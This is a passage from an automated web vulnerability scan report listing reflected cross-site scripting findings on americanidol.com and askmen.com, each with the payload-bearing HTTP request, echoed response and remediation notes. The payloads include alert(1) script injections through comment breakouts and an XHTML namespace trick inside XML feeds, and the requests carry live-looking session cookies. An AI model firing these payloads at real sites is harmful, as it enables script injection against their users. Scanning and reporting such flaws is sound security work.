GET /videos/hot/qty/1219773<a>f6cff111e75?feed=1&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:10 GMT
Content-Length: 15316
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/1219773<a>f6cff111e75?feed=1&dfpzone=idol_home]]>
...[SNIP]...

1.119. http://www.americanidol.com/videos/hot/qty/12 [dfpzone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of the dfpzone request parameter is copied into the XML document as plain text between tags. The payload 2c922<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4db02091615 was submitted in the dfpzone parameter. This input was echoed as 2c922<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4db02091615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videos/hot/qty/12?feed=1&dfpzone=idol_home2c922<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4db02091615 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172796
Date: Tue, 04 Oct 2011 20:13:04 GMT
Content-Length: 19200
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[{"rating":"4.8","totalvotes":"11","dfpzone":"idol_home2c922<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4db02091615","video_slug":"who_is_most_likely_tweet","itunes_url":"","season":"10","fallbackID":"74091","playlist_slug":"idols_live_tour","playlist_season":"10","playlist_title":"Idols Live Tour"}]]>
...[SNIP]...

1.120. http://www.americanidol.com/videos/hot/qty/12 [feed parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload f13a1<a>a7ef02b2c8e was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12?feed=1f13a1<a>a7ef02b2c8e&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:02 GMT
Content-Length: 18048
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12?feed=1f13a1<a>a7ef02b2c8e&dfpzone=idol_home]]>
...[SNIP]...

1.121. http://www.americanidol.com/videos/hot/qty/12 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5d505<a>8940690ae14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12?feed=1&dfpzone=idol_home&5d505<a>8940690ae14=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:06 GMT
Content-Length: 18051
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12?feed=1&dfpzone=idol_home&5d505<a>8940690ae14=1]]>
...[SNIP]...

1.122. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f834c<a>d03fcb067cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qtyf834c<a>d03fcb067cc/12/?feed=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172775
Date: Tue, 04 Oct 2011 20:07:13 GMT
Content-Length: 15299
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qtyf834c<a>d03fcb067cc/12/?feed=1]]>
...[SNIP]...

1.123. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cb92<a>dde1bcc21a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/128cb92<a>dde1bcc21a8/?feed=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172782
Date: Tue, 04 Oct 2011 20:07:17 GMT
Content-Length: 15299
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/128cb92<a>dde1bcc21a8/?feed=1]]>
...[SNIP]...

1.124. http://www.americanidol.com/videos/hot/qty/12/ [feed parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 3d9af<a>8a041e21996 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12/?feed=13d9af<a>8a041e21996 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:06:09 GMT
Content-Length: 18031
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12/?feed=13d9af<a>8a041e21996]]>
...[SNIP]...

1.125. http://www.americanidol.com/videos/hot/qty/12/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6441<a>9e35cfbb954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12/?feed=1&d6441<a>9e35cfbb954=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172795
Date: Tue, 04 Oct 2011 20:06:43 GMT
Content-Length: 18034
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12/?feed=1&d6441<a>9e35cfbb954=1]]>
...[SNIP]...

1.126. http://www.askmen.com/api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6036--><script>alert(1)</script>748fd2d4c5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /apie6036--><script>alert(1)</script>748fd2d4c5b/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762?_=1317758821320 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; rsi_segs=; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; show_snazzy_title2=2

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38712
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:02 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : apie6036--><script>alert(1)</script>748fd2d4c5b/articles/getTodaysArticles/country:us.json/-->

1.127. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b742c--><script>alert(1)</script>8a0f8c6be90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesb742c--><script>alert(1)</script>8a0f8c6be90/js/am/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:06:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:06:58 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includesb742c--><script>alert(1)</script>8a0f8c6be90/js/am/min.php/-->

1.128. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 96a26--><script>alert(1)</script>80fa17cac57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js96a26--><script>alert(1)</script>80fa17cac57/am/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/js96a26--><script>alert(1)</script>80fa17cac57/am/min.php/-->

1.129. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
